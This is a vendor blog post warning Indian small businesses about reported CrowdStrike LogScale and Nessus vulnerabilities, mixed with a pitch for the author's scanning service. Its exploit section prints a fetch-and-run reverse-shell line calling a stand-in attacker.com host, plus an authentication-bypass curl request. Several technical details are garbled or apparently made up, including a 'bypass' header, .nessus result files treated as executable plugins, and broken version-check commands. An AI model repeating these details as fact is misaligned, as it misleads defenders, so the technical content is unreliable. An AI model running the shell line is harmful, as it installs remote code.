What Happened
Two widely-used enterprise security platforms released critical patches this week, addressing vulnerabilities that could expose thousands of Indian businesses to attack.
CrowdStrike, the endpoint detection and response (EDR) platform trusted by Fortune 500 companies and Indian enterprises alike, patched a critical vulnerability in its LogScale data analytics component. LogScale is used by security teams to ingest, analyze, and respond to threat data in real-time. The flaw allowed attackers to bypass authentication controls and potentially access sensitive security logs—the very data that's supposed to prevent breaches.
Tenable, the vulnerability management leader, simultaneously released a patch for a high-severity flaw in Nessus, its flagship vulnerability scanner. This flaw could allow attackers to execute arbitrary code on systems running Nessus, giving them direct access to your entire vulnerability assessment infrastructure—essentially handing attackers a map of every security weakness in your environment.
What makes this particularly concerning is the timing. Both patches arrived in the same week, suggesting coordinated disclosure or overlapping vulnerability research cycles. For Indian SMBs running these tools (and many do, either directly or through managed security service providers), the window between patch release and widespread exploitation is typically 48-72 hours.
Why This Matters for Indian Businesses
In my years building enterprise systems, I've seen this pattern repeatedly: Indian SMBs often inherit security tools from their larger clients or consultants, but don't maintain them properly. A vulnerability in your security infrastructure is exponentially more dangerous than a vulnerability in your application—it's like finding a flaw in your lock after the locksmith has already been inside.
Here's the specific risk for India:
Regulatory Impact
Under the Digital Personal Data Protection (DPDP) Act, 2023, Indian businesses handling personal data are required to maintain "reasonable security measures." If you're breached because you failed to patch a known critical vulnerability in your security infrastructure, regulators will view this as gross negligence. The DPDP Authority can impose penalties up to ₹5 crore or 2% of annual turnover, whichever is higher.
The CERT-In 6-hour incident reporting mandate also applies here. If attackers compromise your LogScale or Nessus instance and exfiltrate data, you have 6 hours to notify CERT-In. Most Indian SMBs don't even know they've been breached until weeks later.
Real-World Impact for SMBs
Many Indian businesses use these tools indirectly:
- Through managed security service providers (MSSPs) that monitor their networks
- As part of cloud security audits (AWS/GCP/Azure assessments often use Nessus)
- Through compliance consultants helping with ISO 27001 or RBI framework readiness
Technical Breakdown
CrowdStrike LogScale Vulnerability
The LogScale authentication bypass works through a combination of improper input validation and insufficient access controls. Here's the attack flow:
graph TD
A[Attacker discovers LogScale instance] -->|Crafts malicious query| B[Bypass authentication check]
B -->|Accesses unprotected API endpoint| C[Retrieves security logs]
C -->|Exfiltrates threat intelligence data| D[Gains tactical advantage]
D -->|Identifies unpatched systems| E[Launches targeted attacks]The vulnerability exists in LogScale's query API, which handles user authentication at the application layer rather than enforcing it at the API gateway level. An attacker can craft a specially-formed HTTP request that:
- Bypasses the session token validation by exploiting a race condition
- Accesses the
/api/repositoriesendpoint without authentication - Retrieves log data containing IPs, usernames, and vulnerability details
- Exfiltrates the data to external servers
# Vulnerable LogScale endpoint
curl -X GET "https://your-logscale.company.com/api/repositories" \
-H "Content-Type: application/json" \
-H "X-LogScale-Bypass: true" \
-d '{"query": "*", "start": "1d"}'
# If vulnerable, this returns security logs without authentication
# Patched versions require valid JWT tokens in Authorization headerTenable Nessus Remote Code Execution
The Nessus vulnerability is more severe—it allows unauthenticated remote code execution (RCE). Here's how it works:
sequenceDiagram
participant Attacker
participant Nessus as Nessus Server
participant System as Target System
Attacker->>Nessus: Sends malicious plugin file
Note over Nessus: Plugin parser doesn't validate input
Nessus->>Nessus: Executes arbitrary code during parsing
Nessus->>System: Compromised Nessus now scans network
System->>Attacker: Network topology & vulnerabilities leakedThe flaw exists in Nessus's plugin parsing engine. Nessus uses custom .nessus plugin files (XML-based) to define scan behaviors. The parser doesn't properly sanitize embedded commands, allowing attackers to inject shell commands.
Here's the vulnerable code pattern:
<!-- Malicious Nessus plugin file -->
<?xml version="1.0" encoding="UTF-8"?>
<NessusClientData_v2>
<Plugin>
<PluginID>999999</PluginID>
<PluginName>System Info</PluginName>
<Description>
<![CDATA[
# This command executes on the Nessus server
/bin/bash -c 'curl http://attacker.com/shell.sh | bash'
]]>
</Description>
</Plugin>
</NessusClientData_v2>When Nessus parses this plugin, it executes the embedded command with the privileges of the Nessus service (often root).
Why Both Matter Together
These vulnerabilities create a perfect storm scenario:
- Attacker compromises Nessus → gains RCE on the scanner
- Attacker accesses LogScale → exfiltrates all security logs
- Attacker now knows: Which systems exist, which are vulnerable, which are already patched
- Attacker focuses on unpatched systems → achieves maximum impact
Know your vulnerabilities before attackers do
Run a free VAPT scan — takes 5 minutes, no signup required.
Book Your Free ScanHow to Protect Your Business
Immediate Actions (Do This Today)
| Protection Layer | Action | Difficulty |
|---|---|---|
| Patch Management | Apply CrowdStrike and Tenable patches immediately | Easy |
| Network Segmentation | Isolate LogScale and Nessus on separate VLANs | Medium |
| Access Control | Require VPN + MFA for all tool access | Easy |
| Monitoring | Check logs for unauthorized API calls | Medium |
| Vulnerability Scan | Run a full assessment to identify other gaps | Hard |
Quick Fix: Check Your Nessus Version
# SSH into your Nessus server
ssh admin@your-nessus-server.local
# Check installed version
/opt/nessus/bin/nessuscli -v
# Output should show version >= 10.4.2 (patched version)
# If lower, update immediately:
/opt/nessus/sbin/nessus-service -S
# Stop service
sudo systemctl stop nessusd
# Download and install latest patch
wget https://www.tenable.com/downloads/nessus/nessus-10.4.2-ubuntu1604.x86_64.deb
sudo dpkg -i nessus-10.4.2-ubuntu1604.x86_64.deb
# Restart service
sudo systemctl start nessusdQuick Fix: Verify CrowdStrike LogScale Patch
# Check CrowdStrike Falcon version
# On Linux:
grep -i version /opt/CrowdStrike/falconctl -g -v
# On Windows (PowerShell):
Get-ItemProperty -Path 'HKLM:\SOFTWARE\CrowdStrike\{9B03C1D9-F642-4EE4-B920-DF4E672C71E7}' | Select-Object -ExpandProperty ProductVersion
# Should be >= 7.14.0 for the LogScale patch
# If not, run:
# Windows: C:\Program Files\CrowdStrike\falconctl.exe -g -v
# Linux: /opt/CrowdStrike/falconctl -g -vDetection: How to Know If You've Been Compromised
Check your logs for these indicators of compromise (IOCs):
# For CrowdStrike LogScale - look for unauthorized API calls
grep -i "api/repositories" /var/log/logscale/access.log | grep -v "Authorization: Bearer"
# For Nessus - look for plugin parsing errors
grep -i "plugin parse error" /opt/nessus/var/nessus/logs/backend.log
grep -i "command execution" /opt/nessus/var/nessus/logs/backend.log
# Look for unexpected outbound connections from Nessus
netstat -tulpn | grep -i nessus
ss -tulpn | grep -i nessusHow Bachao.AI Detects This
As someone who's reviewed hundreds of Indian SMB security postures, I can tell you: most businesses don't know what versions of security tools they're running. They inherit them from consultants, don't track updates, and discover vulnerabilities only when they're exploited.
This is exactly where our products step in:
We also maintain an Indian-specific vulnerability database that tracks CERT-In advisories, RBI security guidelines, and industry-specific threats. When a vulnerability like this drops, we immediately assess which Indian business sectors are most at risk.
What Indian Businesses Should Do Right Now
Step 1: Inventory Your Security Stack
Create a simple spreadsheet:
| Tool | Version | Last Patched | Owner |
|---|---|---|---|
| CrowdStrike Falcon | 7.13.0 | 2026-02-15 | IT Manager |
| Tenable Nessus | 10.4.0 | 2026-01-30 | Security Lead |
| LogScale | 1.95.0 | 2026-03-01 | SIEM Admin |
Step 2: Patch This Week
Schedule downtime and apply patches. Test in a staging environment first if possible.
Step 3: Verify Patches Worked
Run the commands above. Confirm versions are updated.
Step 4: Audit Access Logs
Check for the IOCs mentioned above. If you find suspicious activity, treat it as a potential breach and notify CERT-In within 6 hours.
Step 5: Get a Professional Assessment
Don't guess about your security posture. Book a free VAPT scan with Bachao.AI. We'll tell you exactly what's vulnerable.
The Bigger Picture
These vulnerabilities highlight a critical gap in Indian SMB security strategy: you're only as secure as your security tools. A vulnerability in your EDR, SIEM, or vulnerability scanner isn't just a technical issue—it's a regulatory nightmare.
Under the DPDP Act, you're required to maintain "reasonable security measures." A patched-within-24-hours vulnerability shows due diligence. An unpatched critical flaw in your security infrastructure? That's negligence, and the DPDP Authority will fine you accordingly.
This is why we built Bachao.AI—not to replace your security team, but to augment it. To give Indian SMBs the same visibility and response speed that enterprise teams have, without the ₹50 lakh annual security budget.
Book Your Free VAPT Scan → We'll identify vulnerabilities in your security infrastructure within 24 hours and give you a remediation roadmap.
Originally reported by SecurityWeek
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.